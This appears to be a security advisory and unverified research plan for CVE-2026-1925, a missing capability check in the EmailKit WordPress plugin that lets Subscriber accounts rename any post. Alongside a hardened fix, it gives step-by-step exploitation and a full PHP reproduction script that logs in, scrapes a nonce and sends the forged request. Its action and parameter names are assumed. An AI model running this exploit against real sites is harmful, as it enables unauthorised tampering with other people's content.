CVE-2026-1925

EmailKit – Email Customizer for WooCommerce & WP <= 1.6.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Title Modification

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 1.6.3
Time to patch: 1d

Description

The EmailKit – Email Customizer for WooCommerce & WP plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'update_template_data' function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the title of any post on the site, including posts, pages, and custom post types.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.6.2
Published: February 17, 2026
Last updated: February 18, 2026
Affected plugin: emailkit

Source Code: WordPress.org SVN

Research Plan (status: Unverified)

Vulnerability Analysis: CVE-2026-1925 (EmailKit – Email Customizer for WooCommerce & WP)

1. Vulnerability Summary

The EmailKit – Email Customizer for WooCommerce & WP plugin (versions <= 1.6.2) is vulnerable to unauthorized data modification due to a missing authorization check in the update_template_data function. The function likely verifies a WordPress nonce, but a nonce only proves that the request came from a page WordPress rendered for this session (CSRF protection); it says nothing about what the user is allowed to do. What is missing is a capability check against the target object, which for modifying a post is current_user_can('edit_post', $post_id). As a result, any authenticated user, including one with the Subscriber role, can change the title of any post, page, or custom post type on the site by supplying its ID.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: emailkit_update_template_data (inferred prefix based on plugin slug) or update_template_data.
  • Vulnerable Parameter: post_id (the ID of the target post) and title (the new title).
  • Authentication: Subscriber level or higher is required.
  • Preconditions: A valid nonce for the update_template_data action must be obtained.

3. Code Flow (Inferred)

  1. Entry Point: An authenticated user sends a POST request to admin-ajax.php with the action emailkit_update_template_data.
  2. Hook Registration: The plugin registers the action via:
    add_action('wp_ajax_emailkit_update_template_data', array($this, 'update_template_data'));
  3. Vulnerable Function: The update_template_data function is called.
  4. Missing Check: The function likely calls check_ajax_referer('emailkit_nonce', 'security'), which only establishes that the request carries a nonce tied to this session, but never calls current_user_can(). The check that belongs here is per object, current_user_can('edit_post', $post_id), not a blanket role test such as manage_options.
  5. Sink: The function retrieves post_id and title from the $_POST array and calls wp_update_post(array('ID' => $post_id, 'post_title' => $title)) without restricting the post type, so the ID can point at any post, page, or custom post type.
  6. Impact: The title of the specified post_id is updated in the database regardless of the user's permissions.
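To make the missing check concrete, here is an added PHP sketch of the handler shape the plan infers, beside the hardened form a fix needs. This is not EmailKit's code and has not been checked against the plugin source: the class names, the nonce action 'emailkit_nonce', the 'security' field, the request parameters and the post type 'emailkit_template' are all assumptions. The difference between the two handlers is the point of the advisory: the nonce check stays, and a per-object capability check is added before the sink.

```php
<?php
/*
 * Added example, not EmailKit's code. Names of the class, nonce action,
 * request fields and post type are assumed for illustration.
 */

/* --- Vulnerable pattern: a nonce check but no capability check ------------ */
class EmailKit_Example_Vulnerable {
    public function __construct() {
        add_action( 'wp_ajax_emailkit_update_template_data', array( $this, 'update_template_data' ) );
    }

    public function update_template_data() {
        // Proves the request came from a page rendered for this session (CSRF
        // defence). Any logged-in user who can load that page gets a valid nonce.
        check_ajax_referer( 'emailkit_nonce', 'security' );

        $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
        $title   = isset( $_POST['title'] ) ? sanitize_text_field( wp_unslash( $_POST['title'] ) ) : '';

        // Sink: a Subscriber with a nonce reaches this for any post ID.
        wp_update_post( array( 'ID' => $post_id, 'post_title' => $title ) );
        wp_send_json_success();
    }
}

/* --- Hardened pattern: nonce AND per-object authorisation ------------------ */
class EmailKit_Example_Hardened {
    public function __construct() {
        add_action( 'wp_ajax_emailkit_update_template_data', array( $this, 'update_template_data' ) );
    }

    public function update_template_data() {
        // Keep the default $die = true. Passing false and ignoring the return
        // value turns the nonce check into a no-op.
        check_ajax_referer( 'emailkit_nonce', 'security' );

        $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
        $title   = isset( $_POST['title'] ) ? sanitize_text_field( wp_unslash( $_POST['title'] ) ) : '';

        // Authorisation is per object: may THIS user edit THIS post?
        // current_user_can( 'edit_post', $id ) is false for a non-existent post.
        if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
            wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
        }

        // The feature is for the plugin's own template posts, so refuse other
        // types too (post type name assumed).
        if ( get_post_type( $post_id ) !== 'emailkit_template' ) {
            wp_send_json_error( array( 'message' => 'wrong post type' ), 400 );
        }

        $result = wp_update_post(
            array( 'ID' => $post_id, 'post_title' => $title ),
            true // return WP_Error instead of 0 on failure
        );
        if ( is_wp_error( $result ) ) {
            wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
        }
        wp_send_json_success( array( 'post_id' => $result ) );
    }
}

// Only the hardened handler should ever be registered in real code.
new EmailKit_Example_Hardened();
```

The role-based alternative, current_user_can('manage_options'), would also close this CVE but over-restricts legitimate Editors and silently breaks if the plugin later lets lower roles own templates; the edit_post meta capability lets WordPress's own ownership and post-status rules decide.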

4. Nonce Acquisition Strategy

To exploit this as a Subscriber, we must find where the plugin exposes the nonce.

  1. Login as Subscriber: Authenticate as a low-privileged user.
  2. Locate Nonce: The plugin likely uses wp_localize_script to pass a nonce to its template editor. Even if a Subscriber cannot access the EmailKit dashboard menu, the script might be enqueued on all admin pages (common in many plugins) or the nonce might be accessible on the frontend if EmailKit components are used.
  3. Check Admin Pages: Navigate to /wp-admin/profile.php.
  4. Browser Evaluation: In the browser's developer console, check for EmailKit global objects.
    • Inferred JS Variable: window.emailkit_config?.nonce or window.emailkit_obj?.security.
    • Action String: Likely emailkit_nonce or emailkit-customizer-nonce.

5. Exploitation Strategy

Step 1: Setup

  • Identify a target post ID (e.g., Post ID 1, usually "Hello world!").
  • Create a Subscriber user account.

Step 2: Nonce Extraction

  • Log in to the WordPress dashboard as the Subscriber.
  • Navigate to /wp-admin/profile.php.
  • Execute JS to find the nonce:
    // Search for any object containing "nonce" or "security" related to emailkit
    Object.keys(window).filter(key => key.toLowerCase().includes('emailkit'))
    
  • Capture the value (e.g., emailkit_obj.nonce).

Step 3: Send Exploit Request

Send the update request with any HTTP client that carries the Subscriber's session cookies (curl with a cookie jar, or Burp Repeater on the browser's session).

  • Method: POST
  • URL: http://[TARGET]/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: emailkit_update_template_data (verify via grep)
    • security: [EXTRACTED_NONCE]
    • post_id: 1 (Target Post ID)
    • title: VULNERABLE-TITLE-MODIFIED

Step 4: Verification

  • Check if the post title has changed using WP-CLI.

6. Test Data Setup

  1. Target Post: Create a post to target and record its ID. On a fresh install the "Hello world!" post is ID 1, but do not assume that on an existing site; --porcelain prints only the new ID.
    • wp post create --post_title="Original Admin Post" --post_status=publish --porcelain
  2. Attacker User: Create a Subscriber user.
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Plugin Activation: Ensure emailkit is active.

7. Expected Results

  • Response: The server should return a JSON success response, e.g., {"success":true}. A bare 0 does not prove failure: admin-ajax.php prints 0 after the hook runs whenever the handler does not end the request itself, so the write may have happened regardless of the body. Verify the database state either way.
  • Database State: The post_title column in the wp_posts table for the target ID should reflect the new title.

8. Verification Steps

  1. Check Title via WP-CLI:
    wp post get 1 --field=post_title
    
    If the output is VULNERABLE-TITLE-MODIFIED, the exploit is successful.
  2. Check via UI:
    Navigate to the site's homepage or the specific post URL to see the modified title.
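The plan's nonce extraction, exploit request and verification as one added PHP script. It is not from the advisory, the plugin or its vendor, and nothing in it has been confirmed against the plugin source: the site URL, the action name emailkit_update_template_data, the nonce field security, the parameters post_id and title, and the assumption that the nonce appears in a wp_localize_script() object whose name contains "emailkit" on a page a Subscriber can open are all placeholders to replace after running the grep from "Alternative Approaches". Verification uses the public REST API instead of WP-CLI so it can run from the attacker's side.

```php
<?php
/*
 * Added reproduction script, not from the advisory or the plugin.
 * Every value marked "assumed" must be confirmed by grepping the plugin.
 * Run only against a test site you own:  php repro.php
 */
const BASE        = 'http://target.example';          // assumed test site
const USER        = 'attacker';                       // Subscriber created with WP-CLI
const PASS        = 'password123';
const POST_ID     = 1;                                // use the ID printed by `wp post create --porcelain`
const TITLE       = 'VULNERABLE-TITLE-MODIFIED';
const ACTION      = 'emailkit_update_template_data';  // assumed action name
const NONCE_FIELD = 'security';                       // assumed request field for the nonce

$jar = tempnam(sys_get_temp_dir(), 'wpjar');

/** One curl call sharing a cookie jar so the WordPress login persists across requests. */
function request(string $jar, string $url, ?array $post = null): array
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIEJAR      => $jar,
        CURLOPT_COOKIEFILE     => $jar,
    ]);
    if ($post !== null) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post));
    }
    $body = (string) curl_exec($ch);
    $out  = [curl_getinfo($ch, CURLINFO_RESPONSE_CODE), curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), $body];
    curl_close($ch);
    return $out;
}

// 1. Log in as the Subscriber. The first GET stores wordpress_test_cookie,
//    which wp-login.php expects to see on the POST.
request($jar, BASE . '/wp-login.php');
[, $url] = request($jar, BASE . '/wp-login.php', [
    'log' => USER, 'pwd' => PASS, 'wp-submit' => 'Log In', 'testcookie' => '1',
    'redirect_to' => BASE . '/wp-admin/profile.php',
]);
if (str_contains($url, 'wp-login.php')) {      // still on the login page: credentials rejected
    fwrite(STDERR, "login failed\n");
    exit(1);
}

// 2. Hunt for the nonce in a localized script object whose name contains
//    "emailkit", on pages a Subscriber can open. WordPress nonces are 10 hex chars.
$nonce = null;
foreach (['/wp-admin/profile.php', '/wp-admin/index.php', '/'] as $page) {
    [, , $html] = request($jar, BASE . $page);
    if (preg_match_all('/var\s+\w*emailkit\w*\s*=\s*(\{.*?\});/is', $html, $objs)) {
        foreach ($objs[1] as $obj) {
            if (preg_match('/"(?:nonce|security)"\s*:\s*"([0-9a-f]{10})"/', $obj, $m)) {
                $nonce = $m[1];
                break 2;
            }
        }
    }
}
if ($nonce === null) {
    fwrite(STDERR, "no EmailKit nonce exposed to this user; the precondition is not met\n");
    exit(1);
}

// 3. Send the unauthorised update with the Subscriber's session.
[$code, , $body] = request($jar, BASE . '/wp-admin/admin-ajax.php', [
    'action'    => ACTION,
    NONCE_FIELD => $nonce,
    'post_id'   => POST_ID,   // assumed parameter names
    'title'     => TITLE,
]);
echo "admin-ajax.php: HTTP $code, body: $body\n";   // a body of "0" does not prove failure

// 4. Verify through the public REST API: the stored title is what matters.
[, , $json] = request($jar, BASE . '/wp-json/wp/v2/posts/' . POST_ID);
$rendered = json_decode($json, true)['title']['rendered'] ?? null;
echo $rendered === TITLE
    ? "VULNERABLE: title changed\n"
    : 'title unchanged: ' . var_export($rendered, true) . "\n";
unlink($jar);
```

If step 2 finds no nonce on any of the three pages, the plan's precondition is not met for this role and the finding cannot be reproduced as a Subscriber; check where else the plugin enqueues its script before concluding anything.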

9. Alternative Approaches

  • Parameter Names: If post_id or title doesn't work, try id, template_id, name, or template_name (as the function name mentions "template_data").
  • REST API: Check if the plugin registers a REST route emailkit/v1/update-template which might share the same vulnerable logic.
  • Action Name: If emailkit_update_template_data is incorrect, grep the plugin directory:
    grep -rn "wp_ajax_" wp-content/plugins/emailkit/ | grep "update_template_data"
    
  • Nonce Check Bypass: If check_ajax_referer is used with the third parameter set to false, the nonce check might be entirely skippable if the result isn't validated.
